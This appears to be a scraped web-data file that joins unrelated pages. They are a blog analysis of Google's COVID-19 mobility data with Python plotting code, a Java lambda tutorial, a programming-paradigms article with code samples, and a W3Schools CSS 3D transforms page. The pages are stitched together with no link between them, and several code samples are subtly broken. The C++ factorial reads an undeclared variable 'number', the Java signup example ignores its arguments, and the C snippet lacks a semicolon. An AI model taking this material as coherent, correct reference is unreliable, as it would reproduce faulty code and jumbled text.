[ { "code": null, "e": 507, "s": 171, "text": "Europe has slowly started opening up after months of restless lockdown, this gives me hope that the worst is behind us. Working from home and virtual wine evenings with friends have become the new ‘normal’. These measures have been put into motion to enforce physical distancing and ultimately slow down the spread of the deadly virus." }, { "code": null, "e": 636, "s": 507, "text": "How effective have these policies been in reducing human movement? What impact has it had on the way people live, work and move?" }, { "code": null, "e": 901, "s": 636, "text": "Google introduced the COVID-19 Community Mobility Reports using anonymous data gathered from apps such as Google Maps. This dataset is regularly updated by Google itself and can be found here. The latest date available for the purpose of this analysis is May 24th." }, { "code": null, "e": 1166, "s": 901, "text": "Specific categories of destinations have been identified in this Google study and they have measured the number of visitors to those destinations. The number of visits per day are then compared to a baseline day (selected to be an average day before the pandemic)." }, { "code": null, "e": 1181, "s": 1166, "text": "Grocery stores" }, { "code": null, "e": 1192, "s": 1181, "text": "Pharmacies" }, { "code": null, "e": 1211, "s": 1192, "text": "Time spent at home" }, { "code": null, "e": 1530, "s": 1211, "text": "A baseline day is a ‘normal day’ (not a holiday, sports event, Valentine’s, St. Patrick’s, etc). The baseline day provides a reliable objective value for a specific day of the week. Meaning that we have a baseline value of people going to the groceries store on Monday, Tuesday, Wednesday, Friday, Saturday and Sunday." }, { "code": null, "e": 1716, "s": 1530, "text": "Creating baseline days is a clever way of differentiating weekend from weekdays for example. I usually do my grocery shopping on weekends, not Tuesdays. I suspect I’m not alone in this." }, { "code": null, "e": 1868, "s": 1716, "text": "In Spain, France or Belgium, supermarkets are not open on Sundays, the baseline value will be lower than for countries where everything is always open." }, { "code": null, "e": 2009, "s": 1868, "text": "The data is presented in percentage change, this can be positive (when mobility to a destination increased) or negative (when it decreased)." }, { "code": null, "e": 2196, "s": 2009, "text": "A choropleth map is a thematic map in which areas are shaded in proportion to a statistical variable that represents an aggregate summary of a geographic characteristic within each area." }, { "code": null, "e": 2483, "s": 2196, "text": "Additionally, I chose to use a line-graph to plot the mobility change in four countries that have been particularly affected by the virus: United States, Brazil and the United Kingdom. I also added New Zealand because they recently eradicated their last case of coronavirus. Impressive!" }, { "code": null, "e": 2617, "s": 2483, "text": "Retail and recreation: How did the number of visitors to retailers and recreation centres change since the beginning of the pandemic?" }, { "code": null, "e": 2725, "s": 2617, "text": "The graph below paints an image of the percentage change in mobility when compared with the baseline value." }, { "code": null, "e": 2757, "s": 2725, "text": "A few observations can be made:" }, { "code": null, "e": 2961, "s": 2757, "text": "March 15th was the first day where more coronavirus cases were recorded outside of mainland China than inside. This triggered the change in mobility pattern for all the countries presented in this study." }, { "code": null, "e": 3131, "s": 2961, "text": "The country with the most noticeable change in mobility compared to baseline values was New Zealand. They reduced their store visits by 90%! More than any other country." }, { "code": null, "e": 3269, "s": 3131, "text": "It is important to notice that the United States as an increasing trend in the number of store visits that started from April 12 onwards." }, { "code": null, "e": 3615, "s": 3269, "text": "After a drastic change in behaviour that reached a peak on March 29th, American’s have allowed themselves to visit more and more retail stores. In comparison, the United Kingdom saw a constant decrease in store visits that hit a minimum on March 29th, but this number of store visits has managed to stay constant throughout the isolation period." }, { "code": null, "e": 4031, "s": 3615, "text": "The number of visits made to pharmacies compared to the baseline varies greatly by country, as can be seen from the graph below. For the United States, the change in number of visits transitioned from positive to negative on the 22nd of March. On this day, the number of coronavirus cases was 26,747, overtaking countries like Spain, Iran and Germany. This made them the third-highest affected country in the world." }, { "code": null, "e": 4157, "s": 4031, "text": "New Zealand is again at the top of the chart with the highest percentage change, meaning they made the least pharmacy visits." }, { "code": null, "e": 4361, "s": 4157, "text": "Note: Unlike the previous two charts, the percentages here are positive and they indicate in increase in time spent at home (previously we were talking about a decrease in visits to stores or pharmacy) ." }, { "code": null, "e": 4399, "s": 4361, "text": "A couple of observations can be made:" }, { "code": null, "e": 4736, "s": 4399, "text": "The United States was the first to enforce stay at home policies, but this translated into only 15 -20% more time spent at home than on baseline days. During April and May, this percentage decreased to 5 -15%. This is in line with the previous observations as the number of store visits and pharmacy visits increased during this period." }, { "code": null, "e": 4829, "s": 4736, "text": "It is surprising to note that the United States behaviour is very similar to that in Brazil." }, { "code": null, "e": 5076, "s": 4829, "text": "New-Zealand was the last to impose stay at home policies, yet they had the biggest percentage change reaching on average 35% more time spent at home. This value stayed constant until early May when the government allowed more freedom of movement." }, { "code": null, "e": 5345, "s": 5076, "text": "Many more insights can be drawn from the information provided by Google’s Mobility report. This article is just an initial appraisal. More updates will come soon, please comment below of you would like to see your country of origin or residence in the updates to come." }, { "code": null, "e": 7850, "s": 5345, "text": "# Import librariesimport numpy as npimport pandas as pdimport plotly as pyimport plotly.express as pximport plotly.graph_objs as gofrom plotly.subplots import make_subplotsfrom tabulate import tabulate# Read Datadf = pd.read_csv(\"data/Global_Mobility_Report.csv\", low_memory=False)# Rename columnsdf = df.rename(columns={'country_region':'Country'})df = df.rename(columns={'date':'Date'})df = df.rename(columns={'retail_and_recreation_percent_change_from_baseline':'retail'})df = df.rename(columns={'grocery_and_pharmacy_percent_change_from_baseline':'pharmacy'})df = df.rename(columns={'parks_percent_change_from_baseline':'parks'})df = df.rename(columns={'transit_stations_percent_change_from_baseline':'transit_station'})df = df.rename(columns={'workplaces_percent_change_from_baseline':'workplaces'})df = df.rename(columns={'residential_percent_change_from_baseline':'residential'})df.drop(['country_region_code','sub_region_1', 'sub_region_2'], axis=1, inplace = True)print(tabulate(df[20000:20050], headers='keys', tablefmt='psql'))# Manipulate Dataframedf_countries = df.groupby(['Country', 'Date']).sum().reset_index().sort_values('Date', ascending=False)df_countries = df_countries.drop_duplicates(subset = ['Country'])# Manipulating the original dataframedf_countrydate = dfdf_countrydate = df_countrydate.groupby(['Date','Country']).sum().reset_index()min_cases = df_countrydate['residential'].min()df_country = df.groupby(['Country','Date']).sum().reset_index()c2 = df_country[df_country['Country']==\"New Zealand\"]c3 = df_country[df_country['Country']==\"Brazil\"]c4 = df_country[df_country['Country']==\"United Kingdom\"]c5 = df_country[df_country['Country']==\"United States\"]frames = [c2, c3, c4, c5]countries = pd.concat(frames)fig = px.line(countries, x=\"Date\", y=\"pharmacy\", title='pharmacy', color = 'Country')# fig.show()fig = px.choropleth(df_countrydate, locations=\"Country\", locationmode=\"country names\", color=\"retail\", hover_name=\"Country\", animation_frame=\"Date\", # range_color=(0, 20000), range_color=(-500, 500), color_continuous_scale=px.colors.diverging.Picnic, color_continuous_midpoint=min_cases, )fig.update_layout( title_text='Stay at home (quarantine) during coronavirus pandemic', title_x=0.5, geo=dict( showframe=False, showcoastlines=False, ))# fig.show()" }, { "code": null, "e": 7919, "s": 7850, "text": "All the code can be found in the world_covid.py file on Github here!" }, { "code": null, "e": 7995, "s": 7919, "text": "If you like my work, I’d greatly appreciate if you followed me Medium here." } ]
Tryit Editor v3.7
Tryit: HTML table - width: 100%
[]
Why we use lambda expressions in Java?
A lambda expression can implement a functional interface by defining an anonymous function that can be passed as an argument to some method. Enables functional programming: All new JVM based languages take advantage of the functional paradigm in their applications, but programmers forced to work with Object-Oriented Programming (OOPS) till lambda expressions came. Hence lambda expressions enable us to write functional code. Readable and concise code: People have started using lambda expressions and reported that it can help to remove a huge number of lines from their code. Easy-to-Use APIs and Libraries: An API designed using lambda expressions can be easier to use and support other API. Enables support for parallel processing: A lambda expression can also enable us to write parallel processing because every processor is a multi-core processor nowadays. (arg1, arg2...) -> { body } or (type1 arg1, type2 arg2...) -> { body } import javax.swing.*; @FunctionalInterface interface Action { void run(String s); } public class LambdaExpressionTest { public void action(Action action) { action.run("Welcome to TutorialsPoint"); } public static void main(String[] args) { new LambdaExpressionTest().action((String s) -> System.out.print("*" + s + "*")); // lambda expression } } *Welcome to TutorialsPoint*
[ { "code": null, "e": 1203, "s": 1062, "text": "A lambda expression can implement a functional interface by defining an anonymous function that can be passed as an argument to some method." }, { "code": null, "e": 1490, "s": 1203, "text": "Enables functional programming: All new JVM based languages take advantage of the functional paradigm in their applications, but programmers forced to work with Object-Oriented Programming (OOPS) till lambda expressions came. Hence lambda expressions enable us to write functional code." }, { "code": null, "e": 1642, "s": 1490, "text": "Readable and concise code: People have started using lambda expressions and reported that it can help to remove a huge number of lines from their code." }, { "code": null, "e": 1759, "s": 1642, "text": "Easy-to-Use APIs and Libraries: An API designed using lambda expressions can be easier to use and support other API." }, { "code": null, "e": 1928, "s": 1759, "text": "Enables support for parallel processing: A lambda expression can also enable us to write parallel processing because every processor is a multi-core processor nowadays." }, { "code": null, "e": 2000, "s": 1928, "text": "(arg1, arg2...) -> { body }\n or\n(type1 arg1, type2 arg2...) -> { body }" }, { "code": null, "e": 2375, "s": 2000, "text": "import javax.swing.*;\n\n@FunctionalInterface\ninterface Action {\n void run(String s);\n}\npublic class LambdaExpressionTest {\n public void action(Action action) {\n action.run(\"Welcome to TutorialsPoint\");\n }\n public static void main(String[] args) {\n new LambdaExpressionTest().action((String s) -> System.out.print(\"*\" + s + \"*\")); // lambda expression\n }\n}" }, { "code": null, "e": 2403, "s": 2375, "text": "*Welcome to TutorialsPoint*" } ]
A Step-by-Step Implementation of Gradient Descent and Backpropagation | by Yitong Ren | Towards Data Science
The original intention behind this post was merely me brushing upon mathematics in neural network, as I like to be well versed in the inner workings of algorithms and get to the essence of things. I then think I might as well put together a story rather than just revisiting the formulas on my notepad over and over. Though you might find a number of tutorials for building a simple neural network from scratch. Different people have varied angles of seeing things as well as the emphasis of study. Another way of thinking might in some sense enhance understanding. So let’s dive in. Neural network in a nutshell The core of neural network is a big function that maps some input to the desired target value, in the intermediate step does the operation to produce the network, which is by multiplying weights and add bias in a pipeline scenario that does this over and over again. The process of training a neural network is to determine a set of parameters that minimize the difference between expected value and model output. This is done using gradient descent (aka backpropagation), which by definition comprises two steps: calculating gradients of the loss/error function, then updating existing parameters in response to the gradients, which is how the descent is done. This cycle is repeated until reaching the minima of the loss function. This learning process can be described by the simple equation: W(t+1) = W(t) — dJ(W)/dW(t). The mathematical intuition For my own practice purpose, I like to use a small network with a single hidden layer as in the diagram. In this layout, X represents input, subscripts i, j, k denote the number of units in the input, hidden and output layers respectively; w_ij represents the weights connecting input to hidden layer, and w_jk is the weights connecting hidden to output layer. The model output calculation, in this case, would be: Often the choice of the loss function is the sum of squared error. Here I use sigmoid activation function and assume bias b is 0 for simplicity, meaning weights are the only variables that affect model output. Let’s derive the formula for calculating gradients of hidden to output weights w_jk. The complexity of determining input to hidden weights is that it affects output error indirectly. Each hidden unit output affects model output, thus input to hidden weights w_ij depend on the errors at all of the units it is connected to. The derivation starts the same, just to expand the chain rule at z_k to the subfunction. More thoughts: Notice that the gradients of the two weights have a similar form. The error is backpropagated via the derivative of activation function, then weighted by the input (the activation output) from the previous layer. In the second formula, the backpropagated error from the output layer is further projected onto w_jk, then repeat the same way of backpropagation and weighted by the input. This backpropagating process is iterated all the way back to the very first layer in an arbitrary-layer neural network. “The gradients with respect to each parameter are thus considered to be the contribution of the parameter to the error and should be negated during learning.” Putting the above process into code: Below is the complete example: import numpy as npclass NeuralNetwork: def __init__(self): np.random.seed(10) # for generating the same results self.wij = np.random.rand(3,4) # input to hidden layer weights self.wjk = np.random.rand(4,1) # hidden layer to output weights def sigmoid(self, x, w): z = np.dot(x, w) return 1/(1 + np.exp(-z)) def sigmoid_derivative(self, x, w): return self.sigmoid(x, w) * (1 - self.sigmoid(x, w)) def gradient_descent(self, x, y, iterations): for i in range(iterations): Xi = x Xj = self.sigmoid(Xi, self.wij) yhat = self.sigmoid(Xj, self.wjk) # gradients for hidden to output weights g_wjk = np.dot(Xj.T, (y - yhat) * self.sigmoid_derivative(Xj, self.wjk)) # gradients for input to hidden weights g_wij = np.dot(Xi.T, np.dot((y - yhat) * self.sigmoid_derivative(Xj, self.wjk), self.wjk.T) * self.sigmoid_derivative(Xi, self.wij)) # update weights self.wij += g_wij self.wjk += g_wjk print('The final prediction from neural network are: ') print(yhat)if __name__ == '__main__': neural_network = NeuralNetwork() print('Random starting input to hidden weights: ') print(neural_network.wij) print('Random starting hidden to output weights: ') print(neural_network.wjk) X = np.array([[0, 0, 1], [1, 1, 1], [1, 0, 1], [0, 1, 1]]) y = np.array([[0, 1, 1, 0]]).T neural_network.gradient_descent(X, y, 10000)
[ { "code": null, "e": 756, "s": 172, "text": "The original intention behind this post was merely me brushing upon mathematics in neural network, as I like to be well versed in the inner workings of algorithms and get to the essence of things. I then think I might as well put together a story rather than just revisiting the formulas on my notepad over and over. Though you might find a number of tutorials for building a simple neural network from scratch. Different people have varied angles of seeing things as well as the emphasis of study. Another way of thinking might in some sense enhance understanding. So let’s dive in." }, { "code": null, "e": 785, "s": 756, "text": "Neural network in a nutshell" }, { "code": null, "e": 1610, "s": 785, "text": "The core of neural network is a big function that maps some input to the desired target value, in the intermediate step does the operation to produce the network, which is by multiplying weights and add bias in a pipeline scenario that does this over and over again. The process of training a neural network is to determine a set of parameters that minimize the difference between expected value and model output. This is done using gradient descent (aka backpropagation), which by definition comprises two steps: calculating gradients of the loss/error function, then updating existing parameters in response to the gradients, which is how the descent is done. This cycle is repeated until reaching the minima of the loss function. This learning process can be described by the simple equation: W(t+1) = W(t) — dJ(W)/dW(t)." }, { "code": null, "e": 1637, "s": 1610, "text": "The mathematical intuition" }, { "code": null, "e": 1998, "s": 1637, "text": "For my own practice purpose, I like to use a small network with a single hidden layer as in the diagram. In this layout, X represents input, subscripts i, j, k denote the number of units in the input, hidden and output layers respectively; w_ij represents the weights connecting input to hidden layer, and w_jk is the weights connecting hidden to output layer." }, { "code": null, "e": 2052, "s": 1998, "text": "The model output calculation, in this case, would be:" }, { "code": null, "e": 2347, "s": 2052, "text": "Often the choice of the loss function is the sum of squared error. Here I use sigmoid activation function and assume bias b is 0 for simplicity, meaning weights are the only variables that affect model output. Let’s derive the formula for calculating gradients of hidden to output weights w_jk." }, { "code": null, "e": 2675, "s": 2347, "text": "The complexity of determining input to hidden weights is that it affects output error indirectly. Each hidden unit output affects model output, thus input to hidden weights w_ij depend on the errors at all of the units it is connected to. The derivation starts the same, just to expand the chain rule at z_k to the subfunction." }, { "code": null, "e": 2690, "s": 2675, "text": "More thoughts:" }, { "code": null, "e": 3355, "s": 2690, "text": "Notice that the gradients of the two weights have a similar form. The error is backpropagated via the derivative of activation function, then weighted by the input (the activation output) from the previous layer. In the second formula, the backpropagated error from the output layer is further projected onto w_jk, then repeat the same way of backpropagation and weighted by the input. This backpropagating process is iterated all the way back to the very first layer in an arbitrary-layer neural network. “The gradients with respect to each parameter are thus considered to be the contribution of the parameter to the error and should be negated during learning.”" }, { "code": null, "e": 3392, "s": 3355, "text": "Putting the above process into code:" }, { "code": null, "e": 3423, "s": 3392, "text": "Below is the complete example:" } ]
Introduction of Programming Paradigms - GeeksforGeeks
25 Apr, 2022 Paradigm can also be termed as method to solve some problem or do some task. Programming paradigm is an approach to solve problem using some programming language or also we can say it is a method to solve a problem using tools and techniques that are available to us following some approach. There are lots for programming language that are known but all of them need to follow some strategy when they are implemented and this methodology/strategy is paradigms. Apart from varieties of programming language there are lots of paradigms to fulfill each and every demand. They are discussed below: 1. Imperative programming paradigm: It is one of the oldest programming paradigm. It features close relation to machine architecture. It is based on Von Neumann architecture. It works by changing the program state through assignment statements. It performs step by step task by changing state. The main focus is on how to achieve the goal. The paradigm consist of several statements and after execution of all the result is stored. Advantage: Very simple to implementIt contains loops, variables etc. Very simple to implement It contains loops, variables etc. Disadvantage: Complex problem cannot be solvedLess efficient and less productiveParallel programming is not possible Complex problem cannot be solved Less efficient and less productive Parallel programming is not possible Examples of Imperative programming paradigm: C : developed by Dennis Ritchie and Ken Thompson Fortan : developed by John Backus for IBM Basic : developed by John G Kemeny and Thomas E Kurtz C // average of five number in C int marks[5] = { 12, 32, 45, 13, 19 } int sum = 0;float average = 0.0;for (int i = 0; i < 5; i++) { sum = sum + marks[i];}average = sum / 5; Imperative programming is divided into three broad categories: Procedural, OOP and parallel processing. These paradigms are as follows: Procedural programming paradigm – This paradigm emphasizes on procedure in terms of under lying machine model. There is no difference in between procedural and imperative approach. It has the ability to reuse the code and it was boon at that time when it was in use because of its reusability. Examples of Procedural programming paradigm: C : developed by Dennis Ritchie and Ken Thompson C++ : developed by Bjarne Stroustrup Java : developed by James Gosling at Sun Microsystems ColdFusion : developed by J J Allaire Pascal : developed by Niklaus Wirth C++ #include <iostream>using namespace std;int main(){ int i, fact = 1, num; cout << "Enter any Number: "; cin >> number; for (i = 1; i <= num; i++) { fact = fact * i; } cout << "Factorial of " << num << " is: " << fact << endl; return 0;} Then comes OOP, Object oriented programming – The program is written as a collection of classes and object which are meant for communication. The smallest and basic entity is object and all kind of computation is performed on the objects only. More emphasis is on data rather procedure. It can handle almost all kind of real life problems which are today in scenario. Advantages: Data security Inheritance Code reusability Flexible and abstraction is also present Examples of Object Oriented programming paradigm: Simula : first OOP language Java : developed by James Gosling at Sun Microsystems C++ : developed by Bjarne Stroustrup Objective-C : designed by Brad Cox Visual Basic .NET : developed by Microsoft Python : developed by Guido van Rossum Ruby : developed by Yukihiro Matsumoto Smalltalk : developed by Alan Kay, Dan Ingalls, Adele Goldberg Java import java.io.*; class GFG { public static void main(String[] args) { System.out.println("GfG!"); Signup s1 = new Signup(); s1.create(22, "riya", "[email protected]", 'F', 89002); }} class Signup { int userid; String name; String emailid; char sex; long mob; public void create(int userid, String name, String emailid, char sex, long mob) { System.out.println("Welcome to GeeksforGeeks\nLets create your account\n"); this.userid = 132; this.name = "Radha"; this.emailid = "[email protected]"; this.sex = 'F'; this.mob = 900558981; System.out.println("your account has been created"); }} Parallel processing approach – Parallel processing is the processing of program instructions by dividing them among multiple processors. A parallel processing system posses many numbers of processor with the objective of running a program in less time by dividing them. This approach seems to be like divide and conquer. Examples are NESL (one of the oldest one) and C/C++ also supports because of some library function. 2. Declarative programming paradigm: It is divided as Logic, Functional, Database. In computer science the declarative programming is a style of building programs that expresses logic of computation without talking about its control flow. It often considers programs as theories of some logic.It may simplify writing parallel programs. The focus is on what needs to be done rather how it should be done basically emphasize on what code code is actually doing. It just declares the result we want rather how it has be produced. This is the only difference between imperative (how to do) and declarative (what to do) programming paradigms. Getting into deeper we would see logic, functional and database. Logic programming paradigms – It can be termed as abstract model of computation. It would solve logical problems like puzzles, series etc. In logic programming we have a knowledge base which we know before and along with the question and knowledge base which is given to machine, it produces result. In normal programming languages, such concept of knowledge base is not available but while using the concept of artificial intelligence, machine learning we have some models like Perception model which is using the same mechanism. In logical programming the main emphasize is on knowledge base and the problem. The execution of the program is very much like proof of mathematical statement, e.g., Prolog sum of two number in prolog: predicates sumoftwonumber(integer, integer) clauses sum(0, 0). sum(n, r):- n1=n-1, sum(n1, r1), r=r1+n Functional programming paradigms – The functional programming paradigms has its roots in mathematics and it is language independent. The key principle of this paradigms is the execution of series of mathematical functions. The central model for the abstraction is the function which are meant for some specific computation and not the data structure. Data are loosely coupled to functions.The function hide their implementation. Function can be replaced with their values without changing the meaning of the program. Some of the languages like perl, javascript mostly uses this paradigm. Examples of Functional programming paradigm: JavaScript : developed by Brendan Eich Haskell : developed by Lennart Augustsson, Dave Barton Scala : developed by Martin Odersky Erlang : developed by Joe Armstrong, Robert Virding Lisp : developed by John Mccarthy ML : developed by Robin Milner Clojure : developed by Rich Hickey The next kind of approach is of Database. Database/Data driven programming approach – This programming methodology is based on data and its movement. Program statements are defined by data rather than hard-coding a series of steps. A database program is the heart of a business information system and provides file creation, data entry, update, query and reporting functions. There are several programming languages that are developed mostly for database application. For example SQL. It is applied to streams of structured data, for filtering, transforming, aggregating (such as computing statistics), or calling other programs. So it has its own wide application. CREATE DATABASE databaseAddress; CREATE TABLE Addr ( PersonID int, LastName varchar(200), FirstName varchar(200), Address varchar(200), City varchar(200), State varchar(200) ); ultralordps khashayarkhm rkbhola5 sumitgumber28 Object-Oriented-Design Picked Technical Scripter 2018 Design Pattern GBlog Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Unified Modeling Language (UML) | Sequence Diagrams Factory method design pattern in Java Adapter Pattern Unified Modeling Language (UML) | An Introduction Builder Design Pattern Must Do Coding Questions for Companies like Amazon, Microsoft, Adobe, ... DSA Sheet by Love Babbar GET and POST requests using Python Must Do Coding Questions for Product Based Companies Practice for cracking any coding interview
[ { "code": null, "e": 25997, "s": 25969, "text": "\n25 Apr, 2022" }, { "code": null, "e": 26593, "s": 25997, "text": "Paradigm can also be termed as method to solve some problem or do some task. Programming paradigm is an approach to solve problem using some programming language or also we can say it is a method to solve a problem using tools and techniques that are available to us following some approach. There are lots for programming language that are known but all of them need to follow some strategy when they are implemented and this methodology/strategy is paradigms. Apart from varieties of programming language there are lots of paradigms to fulfill each and every demand. They are discussed below: " }, { "code": null, "e": 27025, "s": 26593, "text": "1. Imperative programming paradigm: It is one of the oldest programming paradigm. It features close relation to machine architecture. It is based on Von Neumann architecture. It works by changing the program state through assignment statements. It performs step by step task by changing state. The main focus is on how to achieve the goal. The paradigm consist of several statements and after execution of all the result is stored." }, { "code": null, "e": 27037, "s": 27025, "text": "Advantage: " }, { "code": null, "e": 27095, "s": 27037, "text": "Very simple to implementIt contains loops, variables etc." }, { "code": null, "e": 27120, "s": 27095, "text": "Very simple to implement" }, { "code": null, "e": 27154, "s": 27120, "text": "It contains loops, variables etc." }, { "code": null, "e": 27170, "s": 27154, "text": "Disadvantage: " }, { "code": null, "e": 27273, "s": 27170, "text": "Complex problem cannot be solvedLess efficient and less productiveParallel programming is not possible" }, { "code": null, "e": 27306, "s": 27273, "text": "Complex problem cannot be solved" }, { "code": null, "e": 27341, "s": 27306, "text": "Less efficient and less productive" }, { "code": null, "e": 27378, "s": 27341, "text": "Parallel programming is not possible" }, { "code": null, "e": 27570, "s": 27378, "text": "Examples of Imperative programming paradigm:\n\nC : developed by Dennis Ritchie and Ken Thompson\nFortan : developed by John Backus for IBM\nBasic : developed by John G Kemeny and Thomas E Kurtz " }, { "code": null, "e": 27572, "s": 27570, "text": "C" }, { "code": "// average of five number in C int marks[5] = { 12, 32, 45, 13, 19 } int sum = 0;float average = 0.0;for (int i = 0; i < 5; i++) { sum = sum + marks[i];}average = sum / 5;", "e": 27747, "s": 27572, "text": null }, { "code": null, "e": 27883, "s": 27747, "text": "Imperative programming is divided into three broad categories: Procedural, OOP and parallel processing. These paradigms are as follows:" }, { "code": null, "e": 28177, "s": 27883, "text": "Procedural programming paradigm – This paradigm emphasizes on procedure in terms of under lying machine model. There is no difference in between procedural and imperative approach. It has the ability to reuse the code and it was boon at that time when it was in use because of its reusability." }, { "code": null, "e": 28438, "s": 28177, "text": "Examples of Procedural programming paradigm:\n\nC : developed by Dennis Ritchie and Ken Thompson\nC++ : developed by Bjarne Stroustrup\nJava : developed by James Gosling at Sun Microsystems\nColdFusion : developed by J J Allaire\nPascal : developed by Niklaus Wirth " }, { "code": null, "e": 28442, "s": 28438, "text": "C++" }, { "code": "#include <iostream>using namespace std;int main(){ int i, fact = 1, num; cout << \"Enter any Number: \"; cin >> number; for (i = 1; i <= num; i++) { fact = fact * i; } cout << \"Factorial of \" << num << \" is: \" << fact << endl; return 0;}", "e": 28706, "s": 28442, "text": null }, { "code": null, "e": 28722, "s": 28706, "text": "Then comes OOP," }, { "code": null, "e": 29074, "s": 28722, "text": "Object oriented programming – The program is written as a collection of classes and object which are meant for communication. The smallest and basic entity is object and all kind of computation is performed on the objects only. More emphasis is on data rather procedure. It can handle almost all kind of real life problems which are today in scenario." }, { "code": null, "e": 29087, "s": 29074, "text": "Advantages: " }, { "code": null, "e": 29101, "s": 29087, "text": "Data security" }, { "code": null, "e": 29113, "s": 29101, "text": "Inheritance" }, { "code": null, "e": 29130, "s": 29113, "text": "Code reusability" }, { "code": null, "e": 29171, "s": 29130, "text": "Flexible and abstraction is also present" }, { "code": null, "e": 29562, "s": 29171, "text": "Examples of Object Oriented programming paradigm:\n\nSimula : first OOP language\nJava : developed by James Gosling at Sun Microsystems\nC++ : developed by Bjarne Stroustrup\nObjective-C : designed by Brad Cox\nVisual Basic .NET : developed by Microsoft\nPython : developed by Guido van Rossum\nRuby : developed by Yukihiro Matsumoto \nSmalltalk : developed by Alan Kay, Dan Ingalls, Adele Goldberg " }, { "code": null, "e": 29567, "s": 29562, "text": "Java" }, { "code": "import java.io.*; class GFG { public static void main(String[] args) { System.out.println(\"GfG!\"); Signup s1 = new Signup(); s1.create(22, \"riya\", \"[email protected]\", 'F', 89002); }} class Signup { int userid; String name; String emailid; char sex; long mob; public void create(int userid, String name, String emailid, char sex, long mob) { System.out.println(\"Welcome to GeeksforGeeks\\nLets create your account\\n\"); this.userid = 132; this.name = \"Radha\"; this.emailid = \"[email protected]\"; this.sex = 'F'; this.mob = 900558981; System.out.println(\"your account has been created\"); }}", "e": 30305, "s": 29567, "text": null }, { "code": null, "e": 30726, "s": 30305, "text": "Parallel processing approach – Parallel processing is the processing of program instructions by dividing them among multiple processors. A parallel processing system posses many numbers of processor with the objective of running a program in less time by dividing them. This approach seems to be like divide and conquer. Examples are NESL (one of the oldest one) and C/C++ also supports because of some library function." }, { "code": null, "e": 31429, "s": 30726, "text": "2. Declarative programming paradigm: It is divided as Logic, Functional, Database. In computer science the declarative programming is a style of building programs that expresses logic of computation without talking about its control flow. It often considers programs as theories of some logic.It may simplify writing parallel programs. The focus is on what needs to be done rather how it should be done basically emphasize on what code code is actually doing. It just declares the result we want rather how it has be produced. This is the only difference between imperative (how to do) and declarative (what to do) programming paradigms. Getting into deeper we would see logic, functional and database." }, { "code": null, "e": 32133, "s": 31429, "text": "Logic programming paradigms – It can be termed as abstract model of computation. It would solve logical problems like puzzles, series etc. In logic programming we have a knowledge base which we know before and along with the question and knowledge base which is given to machine, it produces result. In normal programming languages, such concept of knowledge base is not available but while using the concept of artificial intelligence, machine learning we have some models like Perception model which is using the same mechanism. In logical programming the main emphasize is on knowledge base and the problem. The execution of the program is very much like proof of mathematical statement, e.g., Prolog" }, { "code": null, "e": 32301, "s": 32133, "text": "sum of two number in prolog:\n\n predicates\n sumoftwonumber(integer, integer)\nclauses\n\n sum(0, 0).\n sum(n, r):-\n n1=n-1,\n sum(n1, r1),\n r=r1+n " }, { "code": null, "e": 32889, "s": 32301, "text": "Functional programming paradigms – The functional programming paradigms has its roots in mathematics and it is language independent. The key principle of this paradigms is the execution of series of mathematical functions. The central model for the abstraction is the function which are meant for some specific computation and not the data structure. Data are loosely coupled to functions.The function hide their implementation. Function can be replaced with their values without changing the meaning of the program. Some of the languages like perl, javascript mostly uses this paradigm." }, { "code": null, "e": 33218, "s": 32889, "text": "Examples of Functional programming paradigm:\n\nJavaScript : developed by Brendan Eich\nHaskell : developed by Lennart Augustsson, Dave Barton\nScala : developed by Martin Odersky\nErlang : developed by Joe Armstrong, Robert Virding\nLisp : developed by John Mccarthy\nML : developed by Robin Milner\nClojure : developed by Rich Hickey " }, { "code": null, "e": 33260, "s": 33218, "text": "The next kind of approach is of Database." }, { "code": null, "e": 33884, "s": 33260, "text": "Database/Data driven programming approach – This programming methodology is based on data and its movement. Program statements are defined by data rather than hard-coding a series of steps. A database program is the heart of a business information system and provides file creation, data entry, update, query and reporting functions. There are several programming languages that are developed mostly for database application. For example SQL. It is applied to streams of structured data, for filtering, transforming, aggregating (such as computing statistics), or calling other programs. So it has its own wide application." }, { "code": null, "e": 34086, "s": 33884, "text": "CREATE DATABASE databaseAddress;\nCREATE TABLE Addr (\n PersonID int,\n LastName varchar(200),\n FirstName varchar(200),\n Address varchar(200),\n City varchar(200),\n State varchar(200)\n); " }, { "code": null, "e": 34098, "s": 34086, "text": "ultralordps" }, { "code": null, "e": 34111, "s": 34098, "text": "khashayarkhm" }, { "code": null, "e": 34120, "s": 34111, "text": "rkbhola5" }, { "code": null, "e": 34134, "s": 34120, "text": "sumitgumber28" }, { "code": null, "e": 34157, "s": 34134, "text": "Object-Oriented-Design" }, { "code": null, "e": 34164, "s": 34157, "text": "Picked" }, { "code": null, "e": 34188, "s": 34164, "text": "Technical Scripter 2018" }, { "code": null, "e": 34203, "s": 34188, "text": "Design Pattern" }, { "code": null, "e": 34209, "s": 34203, "text": "GBlog" }, { "code": null, "e": 34307, "s": 34209, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 34359, "s": 34307, "text": "Unified Modeling Language (UML) | Sequence Diagrams" }, { "code": null, "e": 34397, "s": 34359, "text": "Factory method design pattern in Java" }, { "code": null, "e": 34413, "s": 34397, "text": "Adapter Pattern" }, { "code": null, "e": 34463, "s": 34413, "text": "Unified Modeling Language (UML) | An Introduction" }, { "code": null, "e": 34486, "s": 34463, "text": "Builder Design Pattern" }, { "code": null, "e": 34560, "s": 34486, "text": "Must Do Coding Questions for Companies like Amazon, Microsoft, Adobe, ..." }, { "code": null, "e": 34585, "s": 34560, "text": "DSA Sheet by Love Babbar" }, { "code": null, "e": 34620, "s": 34585, "text": "GET and POST requests using Python" }, { "code": null, "e": 34673, "s": 34620, "text": "Must Do Coding Questions for Product Based Companies" } ]
CSS 3D Transforms
CSS also supports 3D transformations. Mouse over the elements below to see the difference between a 2D and a 3D transformation: In this chapter you will learn about the following CSS property: transform The numbers in the table specify the first browser version that fully supports the property. With the CSS transform property you can use the following 3D transformation methods: rotateX() rotateY() rotateZ() The rotateX() method rotates an element around its X-axis at a given degree: The rotateY() method rotates an element around its Y-axis at a given degree: The rotateZ() method rotates an element around its Z-axis at a given degree: With the transform property, rotate the <div> element 150deg around its X-axis.. <style> div { width: 100px; height: 100px; background-color: lightblue; border: 1px solid black; : ; } </style> <body> <div>This is a div</div> </body> Start the Exercise The following table lists all the 3D transform properties: We just launchedW3Schools videos Get certifiedby completinga course today! If you want to report an error, or if you want to make a suggestion, do not hesitate to send us an e-mail: [email protected] Your message has been sent to W3Schools.
